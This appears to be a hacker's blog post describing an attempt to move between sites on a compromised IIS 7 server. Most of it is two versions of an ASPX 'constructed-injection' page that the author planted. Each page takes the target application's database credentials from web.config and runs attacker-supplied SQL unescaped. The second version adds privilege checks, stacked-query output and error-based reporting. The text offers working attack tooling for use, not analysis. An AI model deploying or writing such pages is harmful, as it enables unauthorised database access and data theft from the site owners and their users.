Yesterday 4z1 and I looked at a site. Privilege escalation was very hard to pull off; we stared at it for a full 5 hours with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services.
Along the way I used an ASPX constructed-injection page to cross over to another site. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own and was done with it. So annoying.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
    // Runs with whatever SQL login the target application's own connection string uses,
    // pulled straight from its web.config; that is why no sa or root is needed.
    void Page_Init(object sender, EventArgs e)
    {
        SqlConnection conn = new SqlConnection();
        // Placeholder: the name of a <connectionStrings> entry in the target's web.config
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["<connection name>"].ConnectionString;
        conn.Open();

        // Attacker-controlled parameter: ?xxser=1
        string i = this.Page.Request.Params["xxser"];

        // Deliberately unparameterized: whatever follows ?xxser= is spliced into the SQL as-is.
        // <table> and <column> are placeholders for any real table/column in the app's database.
        SqlCommand command = new SqlCommand("select * from [<table>] where <column> = " + i, conn);
        // ExecuteNonQuery returns -1 for a SELECT and never reads rows back, so this page
        // drives injection through error messages or stacked statements, not returned data.
        int x = command.ExecuteNonQuery();
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 ASPX constructed-injection page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>
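An added example of my own, not the post's code: the same idea, but the page reads rows back with SqlDataReader so the result of the injected statement is actually visible (ExecuteNonQuery hands back -1 for a SELECT), and it first reports which login the application's connection string gives you and whether that login is sysadmin or db_owner. That check is what decides whether crossing into another database on the server is possible at all; the page only ever has the rights of the web.config login. The `<connection name>`, `<table>` and `<column>` values are placeholders to fill in from the target's web.config and schema, and `xxser` is just the same parameter name the post uses.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    // Placeholder: a <connectionStrings> entry in the target's web.config
    const string ConnName = "<connection name>";

    // Context query: which SQL login the app's connection string uses and what it can do.
    // If is_sysadmin is 0 and the login has no rights on other databases, 跨库 is off the table.
    const string WhoAmISql =
        "SELECT SUSER_SNAME() AS login_name, DB_NAME() AS db, " +
        "IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin, " +
        "IS_MEMBER('db_owner') AS is_dbo, @@VERSION AS version";

    void Page_Load(object sender, EventArgs e)
    {
        Response.ContentType = "text/plain";
        // Attacker-controlled parameter, deliberately spliced into the statement unescaped
        string i = Request.Params["xxser"];

        using (SqlConnection conn = new SqlConnection(
                   ConfigurationManager.ConnectionStrings[ConnName].ConnectionString))
        {
            conn.Open();
            Response.Write("-- context --\n");
            Dump(conn, WhoAmISql);

            if (!string.IsNullOrEmpty(i))
            {
                string sql = "select * from [<table>] where <column> = " + i;
                Response.Write("\n-- query --\n" + sql + "\n");
                Dump(conn, sql);
            }
        }
    }

    // Execute a statement and print the column names and every row of every result set,
    // tab separated. Stacked statements ("1; select ...") produce several result sets,
    // which NextResult() walks through.
    void Dump(SqlConnection conn, string sql)
    {
        try
        {
            using (SqlCommand cmd = new SqlCommand(sql, conn))
            using (SqlDataReader rd = cmd.ExecuteReader())
            {
                do
                {
                    for (int c = 0; c < rd.FieldCount; c++)
                        Response.Write(rd.GetName(c) + (c + 1 < rd.FieldCount ? "\t" : "\n"));

                    while (rd.Read())
                    {
                        for (int c = 0; c < rd.FieldCount; c++)
                        {
                            string v = rd.IsDBNull(c) ? "NULL" : rd.GetValue(c).ToString();
                            Response.Write(v + (c + 1 < rd.FieldCount ? "\t" : "\n"));
                        }
                    }
                } while (rd.NextResult());
            }
        }
        catch (SqlException ex)
        {
            // Surface the server's own error text; that is what error-based injection keys on
            Response.Write("SQL error " + ex.Number + ": " + ex.Message + "\n");
        }
    }
</script>
```

Request it once with no parameter to see the login context, then with `?xxser=...` to run the constructed statement; because the connection comes from the application's own web.config, the page shows exactly the database reach the application itself has and nothing more.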